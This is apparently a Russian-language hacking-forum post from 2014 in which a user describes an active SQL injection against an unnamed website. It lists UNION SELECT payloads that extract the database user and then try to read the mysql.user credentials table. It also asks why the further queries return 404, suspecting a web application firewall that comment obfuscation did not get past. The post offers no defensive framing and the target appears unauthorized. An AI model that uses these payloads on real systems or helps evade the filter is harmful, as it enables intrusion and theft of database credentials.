12.08.2014, 04:59
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
Провел на форуме:
178623
Репутация:
94
|
|
Есть одна инъекция.
Код:
/-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+
Отлично выводит пользователя.
Код:
-1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Тогда я подумал подставить валидное значение
Код:
-45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.
Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.
Ответ - 404 Not Found
Вообще любые запросы отвечают 404.
Что это может быть? |
|
|